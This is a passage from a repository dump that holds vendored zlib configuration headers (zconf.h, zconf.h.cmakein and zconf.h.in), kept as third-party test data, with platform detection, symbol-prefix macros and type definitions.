Maximum value for windowBits in deflateInit2 and inflateInit2. * WARNING: reducing MAX_WBITS makes minigzip unable to extract .gz files * created by gzip. (Files created by minigzip can still be extracted by * gzip.) */ #ifndef MAX_WBITS # define MAX_WBITS 15 /* 32K LZ77 window */ #endif /* The memory requirements for deflate are (in bytes): (1 << (windowBits+2)) + (1 << (memLevel+9)) that is: 128K for windowBits=15 + 128K for memLevel = 8 (default values) plus a few kilobytes for small objects. 
For example, if you want to reduce the default memory requirements from 256K to 128K, compile with make CFLAGS="-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7" Of course this will generally degrade compression (there's no free lunch). The memory requirements for inflate are (in bytes) 1 << windowBits that is, 32K for windowBits=15 (default value) plus about 7 kilobytes for small objects. */ /* Type declarations */ #ifndef OF /* function prototypes */ # ifdef STDC # define OF(args) args # else # define OF(args) () # endif #endif #ifndef Z_ARG /* function prototypes for stdarg */ # if defined(STDC) || defined(Z_HAVE_STDARG_H) # define Z_ARG(args) args # else # define Z_ARG(args) () # endif #endif /* The following definitions for FAR are needed only for MSDOS mixed * model programming (small or medium model with some far allocations). * This was tested only with MSC; for other MSDOS compilers you may have * to define NO_MEMCPY in zutil.h. If you don't need the mixed model, * just define FAR to be empty. */ #ifdef SYS16BIT # if defined(M_I86SM) || defined(M_I86MM) /* MSC small or medium model */ # define SMALL_MEDIUM # ifdef _MSC_VER # define FAR _far # else # define FAR far # endif # endif # if (defined(__SMALL__) || defined(__MEDIUM__)) /* Turbo C small or medium model */ # define SMALL_MEDIUM # ifdef __BORLANDC__ # define FAR _far # else # define FAR far # endif # endif #endif #if defined(WINDOWS) || defined(WIN32) /* If building or using zlib as a DLL, define ZLIB_DLL. * This is not mandatory, but it offers a little performance increase. */ # ifdef ZLIB_DLL # if defined(WIN32) && (!defined(__BORLANDC__) || (__BORLANDC__ >= 0x500)) # ifdef ZLIB_INTERNAL # define ZEXTERN extern __declspec(dllexport) # else # define ZEXTERN extern __declspec(dllimport) # endif # endif # endif /* ZLIB_DLL */ /* If building or using zlib with the WINAPI/WINAPIV calling convention, * define ZLIB_WINAPI. * Caution: the standard ZLIB1.DLL is NOT compiled using ZLIB_WINAPI. 
*/ # ifdef ZLIB_WINAPI # ifdef FAR # undef FAR # endif # ifndef WIN32_LEAN_AND_MEAN # define WIN32_LEAN_AND_MEAN # endif # include /* No need for _export, use ZLIB.DEF instead. */ /* For complete Windows compatibility, use WINAPI, not __stdcall. */ # define ZEXPORT WINAPI # ifdef WIN32 # define ZEXPORTVA WINAPIV # else # define ZEXPORTVA FAR CDECL # endif # endif #endif #if defined (__BEOS__) # ifdef ZLIB_DLL # ifdef ZLIB_INTERNAL # define ZEXPORT __declspec(dllexport) # define ZEXPORTVA __declspec(dllexport) # else # define ZEXPORT __declspec(dllimport) # define ZEXPORTVA __declspec(dllimport) # endif # endif #endif #ifndef ZEXTERN # define ZEXTERN extern #endif #ifndef ZEXPORT # define ZEXPORT #endif #ifndef ZEXPORTVA # define ZEXPORTVA #endif #ifndef FAR # define FAR #endif #if !defined(__MACTYPES__) typedef unsigned char Byte; /* 8 bits */ #endif typedef unsigned int uInt; /* 16 bits or more */ typedef unsigned long uLong; /* 32 bits or more */ #ifdef SMALL_MEDIUM /* Borland C/C++ and some old MSC versions ignore FAR inside typedef */ # define Bytef Byte FAR #else typedef Byte FAR Bytef; #endif typedef char FAR charf; typedef int FAR intf; typedef uInt FAR uIntf; typedef uLong FAR uLongf; #ifdef STDC typedef void const *voidpc; typedef void FAR *voidpf; typedef void *voidp; #else typedef Byte const *voidpc; typedef Byte FAR *voidpf; typedef Byte *voidp; #endif #if !defined(Z_U4) && !defined(Z_SOLO) && defined(STDC) # include # if (UINT_MAX == 0xffffffffUL) # define Z_U4 unsigned # elif (ULONG_MAX == 0xffffffffUL) # define Z_U4 unsigned long # elif (USHRT_MAX == 0xffffffffUL) # define Z_U4 unsigned short # endif #endif #ifdef Z_U4 typedef Z_U4 z_crc_t; #else typedef unsigned long z_crc_t; #endif #ifdef HAVE_UNISTD_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_UNISTD_H #endif #ifdef HAVE_STDARG_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_STDARG_H #endif #ifdef STDC # ifndef Z_SOLO # include /* for off_t */ # endif #endif #if 
defined(STDC) || defined(Z_HAVE_STDARG_H) # ifndef Z_SOLO # include /* for va_list */ # endif #endif #ifdef _WIN32 # ifndef Z_SOLO # include /* for wchar_t */ # endif #endif /* a little trick to accommodate both "#define _LARGEFILE64_SOURCE" and * "#define _LARGEFILE64_SOURCE 1" as requesting 64-bit operations, (even * though the former does not conform to the LFS document), but considering * both "#undef _LARGEFILE64_SOURCE" and "#define _LARGEFILE64_SOURCE 0" as * equivalently requesting no 64-bit operations */ #if defined(_LARGEFILE64_SOURCE) && -_LARGEFILE64_SOURCE - -1 == 1 # undef _LARGEFILE64_SOURCE #endif #ifndef Z_HAVE_UNISTD_H # ifdef __WATCOMC__ # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_HAVE_UNISTD_H # if defined(_LARGEFILE64_SOURCE) && !defined(_WIN32) # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_SOLO # if defined(Z_HAVE_UNISTD_H) # include /* for SEEK_*, off_t, and _LFS64_LARGEFILE */ # ifdef VMS # include /* for off_t */ # endif # ifndef z_off_t # define z_off_t off_t # endif # endif #endif #if defined(_LFS64_LARGEFILE) && _LFS64_LARGEFILE-0 # define Z_LFS64 #endif #if defined(_LARGEFILE64_SOURCE) && defined(Z_LFS64) # define Z_LARGE64 #endif #if defined(_FILE_OFFSET_BITS) && _FILE_OFFSET_BITS-0 == 64 && defined(Z_LFS64) # define Z_WANT64 #endif #if !defined(SEEK_SET) && !defined(Z_SOLO) # define SEEK_SET 0 /* Seek from beginning of file. */ # define SEEK_CUR 1 /* Seek from current position. 
*/ # define SEEK_END 2 /* Set file pointer to EOF plus "offset" */ #endif #ifndef z_off_t # define z_off_t long #endif #if !defined(_WIN32) && defined(Z_LARGE64) # define z_off64_t off64_t #else # if defined(_WIN32) && !defined(__GNUC__) # define z_off64_t __int64 # else # define z_off64_t z_off_t # endif #endif /* MVS linker does not support external names larger than 8 bytes */ #if defined(__MVS__) #pragma map(deflateInit_,"DEIN") #pragma map(deflateInit2_,"DEIN2") #pragma map(deflateEnd,"DEEND") #pragma map(deflateBound,"DEBND") #pragma map(inflateInit_,"ININ") #pragma map(inflateInit2_,"ININ2") #pragma map(inflateEnd,"INEND") #pragma map(inflateSync,"INSY") #pragma map(inflateSetDictionary,"INSEDI") #pragma map(compressBound,"CMBND") #pragma map(inflate_table,"INTABL") #pragma map(inflate_fast,"INFA") #pragma map(inflate_copyright,"INCOPY") #endif #endif /* ZCONF_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zconf.h.cmakein ================================================ /* zconf.h -- configuration of the zlib compression library * Copyright (C) 1995-2016 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #ifndef ZCONF_H #define ZCONF_H #cmakedefine Z_PREFIX #cmakedefine Z_HAVE_UNISTD_H /* * If you *really* need a unique prefix for all types and library functions, * compile with -DZ_PREFIX. The "standard" zlib should be compiled without it. * Even better than compiling with -DZ_PREFIX would be to use configure to set * this permanently in zconf.h using "./configure --zprefix". 
*/ #ifdef Z_PREFIX /* may be set to #if 1 by ./configure */ # define Z_PREFIX_SET /* all linked symbols and init macros */ # define _dist_code z__dist_code # define _length_code z__length_code # define _tr_align z__tr_align # define _tr_flush_bits z__tr_flush_bits # define _tr_flush_block z__tr_flush_block # define _tr_init z__tr_init # define _tr_stored_block z__tr_stored_block # define _tr_tally z__tr_tally # define adler32 z_adler32 # define adler32_combine z_adler32_combine # define adler32_combine64 z_adler32_combine64 # define adler32_z z_adler32_z # ifndef Z_SOLO # define compress z_compress # define compress2 z_compress2 # define compressBound z_compressBound # endif # define crc32 z_crc32 # define crc32_combine z_crc32_combine # define crc32_combine64 z_crc32_combine64 # define crc32_combine_gen z_crc32_combine_gen # define crc32_combine_gen64 z_crc32_combine_gen64 # define crc32_combine_op z_crc32_combine_op # define crc32_z z_crc32_z # define deflate z_deflate # define deflateBound z_deflateBound # define deflateCopy z_deflateCopy # define deflateEnd z_deflateEnd # define deflateGetDictionary z_deflateGetDictionary # define deflateInit z_deflateInit # define deflateInit2 z_deflateInit2 # define deflateInit2_ z_deflateInit2_ # define deflateInit_ z_deflateInit_ # define deflateParams z_deflateParams # define deflatePending z_deflatePending # define deflatePrime z_deflatePrime # define deflateReset z_deflateReset # define deflateResetKeep z_deflateResetKeep # define deflateSetDictionary z_deflateSetDictionary # define deflateSetHeader z_deflateSetHeader # define deflateTune z_deflateTune # define deflate_copyright z_deflate_copyright # define get_crc_table z_get_crc_table # ifndef Z_SOLO # define gz_error z_gz_error # define gz_intmax z_gz_intmax # define gz_strwinerror z_gz_strwinerror # define gzbuffer z_gzbuffer # define gzclearerr z_gzclearerr # define gzclose z_gzclose # define gzclose_r z_gzclose_r # define gzclose_w z_gzclose_w # define gzdirect 
z_gzdirect # define gzdopen z_gzdopen # define gzeof z_gzeof # define gzerror z_gzerror # define gzflush z_gzflush # define gzfread z_gzfread # define gzfwrite z_gzfwrite # define gzgetc z_gzgetc # define gzgetc_ z_gzgetc_ # define gzgets z_gzgets # define gzoffset z_gzoffset # define gzoffset64 z_gzoffset64 # define gzopen z_gzopen # define gzopen64 z_gzopen64 # ifdef _WIN32 # define gzopen_w z_gzopen_w # endif # define gzprintf z_gzprintf # define gzputc z_gzputc # define gzputs z_gzputs # define gzread z_gzread # define gzrewind z_gzrewind # define gzseek z_gzseek # define gzseek64 z_gzseek64 # define gzsetparams z_gzsetparams # define gztell z_gztell # define gztell64 z_gztell64 # define gzungetc z_gzungetc # define gzvprintf z_gzvprintf # define gzwrite z_gzwrite # endif # define inflate z_inflate # define inflateBack z_inflateBack # define inflateBackEnd z_inflateBackEnd # define inflateBackInit z_inflateBackInit # define inflateBackInit_ z_inflateBackInit_ # define inflateCodesUsed z_inflateCodesUsed # define inflateCopy z_inflateCopy # define inflateEnd z_inflateEnd # define inflateGetDictionary z_inflateGetDictionary # define inflateGetHeader z_inflateGetHeader # define inflateInit z_inflateInit # define inflateInit2 z_inflateInit2 # define inflateInit2_ z_inflateInit2_ # define inflateInit_ z_inflateInit_ # define inflateMark z_inflateMark # define inflatePrime z_inflatePrime # define inflateReset z_inflateReset # define inflateReset2 z_inflateReset2 # define inflateResetKeep z_inflateResetKeep # define inflateSetDictionary z_inflateSetDictionary # define inflateSync z_inflateSync # define inflateSyncPoint z_inflateSyncPoint # define inflateUndermine z_inflateUndermine # define inflateValidate z_inflateValidate # define inflate_copyright z_inflate_copyright # define inflate_fast z_inflate_fast # define inflate_table z_inflate_table # ifndef Z_SOLO # define uncompress z_uncompress # define uncompress2 z_uncompress2 # endif # define zError z_zError # ifndef 
Z_SOLO # define zcalloc z_zcalloc # define zcfree z_zcfree # endif # define zlibCompileFlags z_zlibCompileFlags # define zlibVersion z_zlibVersion /* all zlib typedefs in zlib.h and zconf.h */ # define Byte z_Byte # define Bytef z_Bytef # define alloc_func z_alloc_func # define charf z_charf # define free_func z_free_func # ifndef Z_SOLO # define gzFile z_gzFile # endif # define gz_header z_gz_header # define gz_headerp z_gz_headerp # define in_func z_in_func # define intf z_intf # define out_func z_out_func # define uInt z_uInt # define uIntf z_uIntf # define uLong z_uLong # define uLongf z_uLongf # define voidp z_voidp # define voidpc z_voidpc # define voidpf z_voidpf /* all zlib structs in zlib.h and zconf.h */ # define gz_header_s z_gz_header_s # define internal_state z_internal_state #endif #if defined(__MSDOS__) && !defined(MSDOS) # define MSDOS #endif #if (defined(OS_2) || defined(__OS2__)) && !defined(OS2) # define OS2 #endif #if defined(_WINDOWS) && !defined(WINDOWS) # define WINDOWS #endif #if defined(_WIN32) || defined(_WIN32_WCE) || defined(__WIN32__) # ifndef WIN32 # define WIN32 # endif #endif #if (defined(MSDOS) || defined(OS2) || defined(WINDOWS)) && !defined(WIN32) # if !defined(__GNUC__) && !defined(__FLAT__) && !defined(__386__) # ifndef SYS16BIT # define SYS16BIT # endif # endif #endif /* * Compile with -DMAXSEG_64K if the alloc function cannot allocate more * than 64k bytes at a time (needed on systems with 16-bit int). 
*/ #ifdef SYS16BIT # define MAXSEG_64K #endif #ifdef MSDOS # define UNALIGNED_OK #endif #ifdef __STDC_VERSION__ # ifndef STDC # define STDC # endif # if __STDC_VERSION__ >= 199901L # ifndef STDC99 # define STDC99 # endif # endif #endif #if !defined(STDC) && (defined(__STDC__) || defined(__cplusplus)) # define STDC #endif #if !defined(STDC) && (defined(__GNUC__) || defined(__BORLANDC__)) # define STDC #endif #if !defined(STDC) && (defined(MSDOS) || defined(WINDOWS) || defined(WIN32)) # define STDC #endif #if !defined(STDC) && (defined(OS2) || defined(__HOS_AIX__)) # define STDC #endif #if defined(__OS400__) && !defined(STDC) /* iSeries (formerly AS/400). */ # define STDC #endif #ifndef STDC # ifndef const /* cannot use !defined(STDC) && !defined(const) on Mac */ # define const /* note: need a more gentle solution here */ # endif #endif #if defined(ZLIB_CONST) && !defined(z_const) # define z_const const #else # define z_const #endif #ifdef Z_SOLO # ifdef _WIN64 typedef unsigned long long z_size_t; # else typedef unsigned long z_size_t; # endif #else # define z_longlong long long # if defined(NO_SIZE_T) typedef unsigned NO_SIZE_T z_size_t; # elif defined(STDC) # include typedef size_t z_size_t; # else typedef unsigned long z_size_t; # endif # undef z_longlong #endif /* Maximum value for memLevel in deflateInit2 */ #ifndef MAX_MEM_LEVEL # ifdef MAXSEG_64K # define MAX_MEM_LEVEL 8 # else # define MAX_MEM_LEVEL 9 # endif #endif /* Maximum value for windowBits in deflateInit2 and inflateInit2. * WARNING: reducing MAX_WBITS makes minigzip unable to extract .gz files * created by gzip. (Files created by minigzip can still be extracted by * gzip.) */ #ifndef MAX_WBITS # define MAX_WBITS 15 /* 32K LZ77 window */ #endif /* The memory requirements for deflate are (in bytes): (1 << (windowBits+2)) + (1 << (memLevel+9)) that is: 128K for windowBits=15 + 128K for memLevel = 8 (default values) plus a few kilobytes for small objects. 
For example, if you want to reduce the default memory requirements from 256K to 128K, compile with make CFLAGS="-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7" Of course this will generally degrade compression (there's no free lunch). The memory requirements for inflate are (in bytes) 1 << windowBits that is, 32K for windowBits=15 (default value) plus about 7 kilobytes for small objects. */ /* Type declarations */ #ifndef OF /* function prototypes */ # ifdef STDC # define OF(args) args # else # define OF(args) () # endif #endif #ifndef Z_ARG /* function prototypes for stdarg */ # if defined(STDC) || defined(Z_HAVE_STDARG_H) # define Z_ARG(args) args # else # define Z_ARG(args) () # endif #endif /* The following definitions for FAR are needed only for MSDOS mixed * model programming (small or medium model with some far allocations). * This was tested only with MSC; for other MSDOS compilers you may have * to define NO_MEMCPY in zutil.h. If you don't need the mixed model, * just define FAR to be empty. */ #ifdef SYS16BIT # if defined(M_I86SM) || defined(M_I86MM) /* MSC small or medium model */ # define SMALL_MEDIUM # ifdef _MSC_VER # define FAR _far # else # define FAR far # endif # endif # if (defined(__SMALL__) || defined(__MEDIUM__)) /* Turbo C small or medium model */ # define SMALL_MEDIUM # ifdef __BORLANDC__ # define FAR _far # else # define FAR far # endif # endif #endif #if defined(WINDOWS) || defined(WIN32) /* If building or using zlib as a DLL, define ZLIB_DLL. * This is not mandatory, but it offers a little performance increase. */ # ifdef ZLIB_DLL # if defined(WIN32) && (!defined(__BORLANDC__) || (__BORLANDC__ >= 0x500)) # ifdef ZLIB_INTERNAL # define ZEXTERN extern __declspec(dllexport) # else # define ZEXTERN extern __declspec(dllimport) # endif # endif # endif /* ZLIB_DLL */ /* If building or using zlib with the WINAPI/WINAPIV calling convention, * define ZLIB_WINAPI. * Caution: the standard ZLIB1.DLL is NOT compiled using ZLIB_WINAPI. 
*/ # ifdef ZLIB_WINAPI # ifdef FAR # undef FAR # endif # ifndef WIN32_LEAN_AND_MEAN # define WIN32_LEAN_AND_MEAN # endif # include /* No need for _export, use ZLIB.DEF instead. */ /* For complete Windows compatibility, use WINAPI, not __stdcall. */ # define ZEXPORT WINAPI # ifdef WIN32 # define ZEXPORTVA WINAPIV # else # define ZEXPORTVA FAR CDECL # endif # endif #endif #if defined (__BEOS__) # ifdef ZLIB_DLL # ifdef ZLIB_INTERNAL # define ZEXPORT __declspec(dllexport) # define ZEXPORTVA __declspec(dllexport) # else # define ZEXPORT __declspec(dllimport) # define ZEXPORTVA __declspec(dllimport) # endif # endif #endif #ifndef ZEXTERN # define ZEXTERN extern #endif #ifndef ZEXPORT # define ZEXPORT #endif #ifndef ZEXPORTVA # define ZEXPORTVA #endif #ifndef FAR # define FAR #endif #if !defined(__MACTYPES__) typedef unsigned char Byte; /* 8 bits */ #endif typedef unsigned int uInt; /* 16 bits or more */ typedef unsigned long uLong; /* 32 bits or more */ #ifdef SMALL_MEDIUM /* Borland C/C++ and some old MSC versions ignore FAR inside typedef */ # define Bytef Byte FAR #else typedef Byte FAR Bytef; #endif typedef char FAR charf; typedef int FAR intf; typedef uInt FAR uIntf; typedef uLong FAR uLongf; #ifdef STDC typedef void const *voidpc; typedef void FAR *voidpf; typedef void *voidp; #else typedef Byte const *voidpc; typedef Byte FAR *voidpf; typedef Byte *voidp; #endif #if !defined(Z_U4) && !defined(Z_SOLO) && defined(STDC) # include # if (UINT_MAX == 0xffffffffUL) # define Z_U4 unsigned # elif (ULONG_MAX == 0xffffffffUL) # define Z_U4 unsigned long # elif (USHRT_MAX == 0xffffffffUL) # define Z_U4 unsigned short # endif #endif #ifdef Z_U4 typedef Z_U4 z_crc_t; #else typedef unsigned long z_crc_t; #endif #ifdef HAVE_UNISTD_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_UNISTD_H #endif #ifdef HAVE_STDARG_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_STDARG_H #endif #ifdef STDC # ifndef Z_SOLO # include /* for off_t */ # endif #endif #if 
defined(STDC) || defined(Z_HAVE_STDARG_H) # ifndef Z_SOLO # include /* for va_list */ # endif #endif #ifdef _WIN32 # ifndef Z_SOLO # include /* for wchar_t */ # endif #endif /* a little trick to accommodate both "#define _LARGEFILE64_SOURCE" and * "#define _LARGEFILE64_SOURCE 1" as requesting 64-bit operations, (even * though the former does not conform to the LFS document), but considering * both "#undef _LARGEFILE64_SOURCE" and "#define _LARGEFILE64_SOURCE 0" as * equivalently requesting no 64-bit operations */ #if defined(_LARGEFILE64_SOURCE) && -_LARGEFILE64_SOURCE - -1 == 1 # undef _LARGEFILE64_SOURCE #endif #ifndef Z_HAVE_UNISTD_H # ifdef __WATCOMC__ # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_HAVE_UNISTD_H # if defined(_LARGEFILE64_SOURCE) && !defined(_WIN32) # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_SOLO # if defined(Z_HAVE_UNISTD_H) # include /* for SEEK_*, off_t, and _LFS64_LARGEFILE */ # ifdef VMS # include /* for off_t */ # endif # ifndef z_off_t # define z_off_t off_t # endif # endif #endif #if defined(_LFS64_LARGEFILE) && _LFS64_LARGEFILE-0 # define Z_LFS64 #endif #if defined(_LARGEFILE64_SOURCE) && defined(Z_LFS64) # define Z_LARGE64 #endif #if defined(_FILE_OFFSET_BITS) && _FILE_OFFSET_BITS-0 == 64 && defined(Z_LFS64) # define Z_WANT64 #endif #if !defined(SEEK_SET) && !defined(Z_SOLO) # define SEEK_SET 0 /* Seek from beginning of file. */ # define SEEK_CUR 1 /* Seek from current position. 
*/ # define SEEK_END 2 /* Set file pointer to EOF plus "offset" */ #endif #ifndef z_off_t # define z_off_t long #endif #if !defined(_WIN32) && defined(Z_LARGE64) # define z_off64_t off64_t #else # if defined(_WIN32) && !defined(__GNUC__) # define z_off64_t __int64 # else # define z_off64_t z_off_t # endif #endif /* MVS linker does not support external names larger than 8 bytes */ #if defined(__MVS__) #pragma map(deflateInit_,"DEIN") #pragma map(deflateInit2_,"DEIN2") #pragma map(deflateEnd,"DEEND") #pragma map(deflateBound,"DEBND") #pragma map(inflateInit_,"ININ") #pragma map(inflateInit2_,"ININ2") #pragma map(inflateEnd,"INEND") #pragma map(inflateSync,"INSY") #pragma map(inflateSetDictionary,"INSEDI") #pragma map(compressBound,"CMBND") #pragma map(inflate_table,"INTABL") #pragma map(inflate_fast,"INFA") #pragma map(inflate_copyright,"INCOPY") #endif #endif /* ZCONF_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zconf.h.in ================================================ /* zconf.h -- configuration of the zlib compression library * Copyright (C) 1995-2016 Jean-loup Gailly, Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #ifndef ZCONF_H #define ZCONF_H /* * If you *really* need a unique prefix for all types and library functions, * compile with -DZ_PREFIX. The "standard" zlib should be compiled without it. * Even better than compiling with -DZ_PREFIX would be to use configure to set * this permanently in zconf.h using "./configure --zprefix". 
*/ #ifdef Z_PREFIX /* may be set to #if 1 by ./configure */ # define Z_PREFIX_SET /* all linked symbols and init macros */ # define _dist_code z__dist_code # define _length_code z__length_code # define _tr_align z__tr_align # define _tr_flush_bits z__tr_flush_bits # define _tr_flush_block z__tr_flush_block # define _tr_init z__tr_init # define _tr_stored_block z__tr_stored_block # define _tr_tally z__tr_tally # define adler32 z_adler32 # define adler32_combine z_adler32_combine # define adler32_combine64 z_adler32_combine64 # define adler32_z z_adler32_z # ifndef Z_SOLO # define compress z_compress # define compress2 z_compress2 # define compressBound z_compressBound # endif # define crc32 z_crc32 # define crc32_combine z_crc32_combine # define crc32_combine64 z_crc32_combine64 # define crc32_combine_gen z_crc32_combine_gen # define crc32_combine_gen64 z_crc32_combine_gen64 # define crc32_combine_op z_crc32_combine_op # define crc32_z z_crc32_z # define deflate z_deflate # define deflateBound z_deflateBound # define deflateCopy z_deflateCopy # define deflateEnd z_deflateEnd # define deflateGetDictionary z_deflateGetDictionary # define deflateInit z_deflateInit # define deflateInit2 z_deflateInit2 # define deflateInit2_ z_deflateInit2_ # define deflateInit_ z_deflateInit_ # define deflateParams z_deflateParams # define deflatePending z_deflatePending # define deflatePrime z_deflatePrime # define deflateReset z_deflateReset # define deflateResetKeep z_deflateResetKeep # define deflateSetDictionary z_deflateSetDictionary # define deflateSetHeader z_deflateSetHeader # define deflateTune z_deflateTune # define deflate_copyright z_deflate_copyright # define get_crc_table z_get_crc_table # ifndef Z_SOLO # define gz_error z_gz_error # define gz_intmax z_gz_intmax # define gz_strwinerror z_gz_strwinerror # define gzbuffer z_gzbuffer # define gzclearerr z_gzclearerr # define gzclose z_gzclose # define gzclose_r z_gzclose_r # define gzclose_w z_gzclose_w # define gzdirect 
z_gzdirect # define gzdopen z_gzdopen # define gzeof z_gzeof # define gzerror z_gzerror # define gzflush z_gzflush # define gzfread z_gzfread # define gzfwrite z_gzfwrite # define gzgetc z_gzgetc # define gzgetc_ z_gzgetc_ # define gzgets z_gzgets # define gzoffset z_gzoffset # define gzoffset64 z_gzoffset64 # define gzopen z_gzopen # define gzopen64 z_gzopen64 # ifdef _WIN32 # define gzopen_w z_gzopen_w # endif # define gzprintf z_gzprintf # define gzputc z_gzputc # define gzputs z_gzputs # define gzread z_gzread # define gzrewind z_gzrewind # define gzseek z_gzseek # define gzseek64 z_gzseek64 # define gzsetparams z_gzsetparams # define gztell z_gztell # define gztell64 z_gztell64 # define gzungetc z_gzungetc # define gzvprintf z_gzvprintf # define gzwrite z_gzwrite # endif # define inflate z_inflate # define inflateBack z_inflateBack # define inflateBackEnd z_inflateBackEnd # define inflateBackInit z_inflateBackInit # define inflateBackInit_ z_inflateBackInit_ # define inflateCodesUsed z_inflateCodesUsed # define inflateCopy z_inflateCopy # define inflateEnd z_inflateEnd # define inflateGetDictionary z_inflateGetDictionary # define inflateGetHeader z_inflateGetHeader # define inflateInit z_inflateInit # define inflateInit2 z_inflateInit2 # define inflateInit2_ z_inflateInit2_ # define inflateInit_ z_inflateInit_ # define inflateMark z_inflateMark # define inflatePrime z_inflatePrime # define inflateReset z_inflateReset # define inflateReset2 z_inflateReset2 # define inflateResetKeep z_inflateResetKeep # define inflateSetDictionary z_inflateSetDictionary # define inflateSync z_inflateSync # define inflateSyncPoint z_inflateSyncPoint # define inflateUndermine z_inflateUndermine # define inflateValidate z_inflateValidate # define inflate_copyright z_inflate_copyright # define inflate_fast z_inflate_fast # define inflate_table z_inflate_table # ifndef Z_SOLO # define uncompress z_uncompress # define uncompress2 z_uncompress2 # endif # define zError z_zError # ifndef 
Z_SOLO # define zcalloc z_zcalloc # define zcfree z_zcfree # endif # define zlibCompileFlags z_zlibCompileFlags # define zlibVersion z_zlibVersion /* all zlib typedefs in zlib.h and zconf.h */ # define Byte z_Byte # define Bytef z_Bytef # define alloc_func z_alloc_func # define charf z_charf # define free_func z_free_func # ifndef Z_SOLO # define gzFile z_gzFile # endif # define gz_header z_gz_header # define gz_headerp z_gz_headerp # define in_func z_in_func # define intf z_intf # define out_func z_out_func # define uInt z_uInt # define uIntf z_uIntf # define uLong z_uLong # define uLongf z_uLongf # define voidp z_voidp # define voidpc z_voidpc # define voidpf z_voidpf /* all zlib structs in zlib.h and zconf.h */ # define gz_header_s z_gz_header_s # define internal_state z_internal_state #endif #if defined(__MSDOS__) && !defined(MSDOS) # define MSDOS #endif #if (defined(OS_2) || defined(__OS2__)) && !defined(OS2) # define OS2 #endif #if defined(_WINDOWS) && !defined(WINDOWS) # define WINDOWS #endif #if defined(_WIN32) || defined(_WIN32_WCE) || defined(__WIN32__) # ifndef WIN32 # define WIN32 # endif #endif #if (defined(MSDOS) || defined(OS2) || defined(WINDOWS)) && !defined(WIN32) # if !defined(__GNUC__) && !defined(__FLAT__) && !defined(__386__) # ifndef SYS16BIT # define SYS16BIT # endif # endif #endif /* * Compile with -DMAXSEG_64K if the alloc function cannot allocate more * than 64k bytes at a time (needed on systems with 16-bit int). 
*/ #ifdef SYS16BIT # define MAXSEG_64K #endif #ifdef MSDOS # define UNALIGNED_OK #endif #ifdef __STDC_VERSION__ # ifndef STDC # define STDC # endif # if __STDC_VERSION__ >= 199901L # ifndef STDC99 # define STDC99 # endif # endif #endif #if !defined(STDC) && (defined(__STDC__) || defined(__cplusplus)) # define STDC #endif #if !defined(STDC) && (defined(__GNUC__) || defined(__BORLANDC__)) # define STDC #endif #if !defined(STDC) && (defined(MSDOS) || defined(WINDOWS) || defined(WIN32)) # define STDC #endif #if !defined(STDC) && (defined(OS2) || defined(__HOS_AIX__)) # define STDC #endif #if defined(__OS400__) && !defined(STDC) /* iSeries (formerly AS/400). */ # define STDC #endif #ifndef STDC # ifndef const /* cannot use !defined(STDC) && !defined(const) on Mac */ # define const /* note: need a more gentle solution here */ # endif #endif #if defined(ZLIB_CONST) && !defined(z_const) # define z_const const #else # define z_const #endif #ifdef Z_SOLO # ifdef _WIN64 typedef unsigned long long z_size_t; # else typedef unsigned long z_size_t; # endif #else # define z_longlong long long # if defined(NO_SIZE_T) typedef unsigned NO_SIZE_T z_size_t; # elif defined(STDC) # include typedef size_t z_size_t; # else typedef unsigned long z_size_t; # endif # undef z_longlong #endif /* Maximum value for memLevel in deflateInit2 */ #ifndef MAX_MEM_LEVEL # ifdef MAXSEG_64K # define MAX_MEM_LEVEL 8 # else # define MAX_MEM_LEVEL 9 # endif #endif /* Maximum value for windowBits in deflateInit2 and inflateInit2. * WARNING: reducing MAX_WBITS makes minigzip unable to extract .gz files * created by gzip. (Files created by minigzip can still be extracted by * gzip.) */ #ifndef MAX_WBITS # define MAX_WBITS 15 /* 32K LZ77 window */ #endif /* The memory requirements for deflate are (in bytes): (1 << (windowBits+2)) + (1 << (memLevel+9)) that is: 128K for windowBits=15 + 128K for memLevel = 8 (default values) plus a few kilobytes for small objects. 
For example, if you want to reduce the default memory requirements from 256K to 128K, compile with make CFLAGS="-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7" Of course this will generally degrade compression (there's no free lunch). The memory requirements for inflate are (in bytes) 1 << windowBits that is, 32K for windowBits=15 (default value) plus about 7 kilobytes for small objects. */ /* Type declarations */ #ifndef OF /* function prototypes */ # ifdef STDC # define OF(args) args # else # define OF(args) () # endif #endif #ifndef Z_ARG /* function prototypes for stdarg */ # if defined(STDC) || defined(Z_HAVE_STDARG_H) # define Z_ARG(args) args # else # define Z_ARG(args) () # endif #endif /* The following definitions for FAR are needed only for MSDOS mixed * model programming (small or medium model with some far allocations). * This was tested only with MSC; for other MSDOS compilers you may have * to define NO_MEMCPY in zutil.h. If you don't need the mixed model, * just define FAR to be empty. */ #ifdef SYS16BIT # if defined(M_I86SM) || defined(M_I86MM) /* MSC small or medium model */ # define SMALL_MEDIUM # ifdef _MSC_VER # define FAR _far # else # define FAR far # endif # endif # if (defined(__SMALL__) || defined(__MEDIUM__)) /* Turbo C small or medium model */ # define SMALL_MEDIUM # ifdef __BORLANDC__ # define FAR _far # else # define FAR far # endif # endif #endif #if defined(WINDOWS) || defined(WIN32) /* If building or using zlib as a DLL, define ZLIB_DLL. * This is not mandatory, but it offers a little performance increase. */ # ifdef ZLIB_DLL # if defined(WIN32) && (!defined(__BORLANDC__) || (__BORLANDC__ >= 0x500)) # ifdef ZLIB_INTERNAL # define ZEXTERN extern __declspec(dllexport) # else # define ZEXTERN extern __declspec(dllimport) # endif # endif # endif /* ZLIB_DLL */ /* If building or using zlib with the WINAPI/WINAPIV calling convention, * define ZLIB_WINAPI. * Caution: the standard ZLIB1.DLL is NOT compiled using ZLIB_WINAPI. 
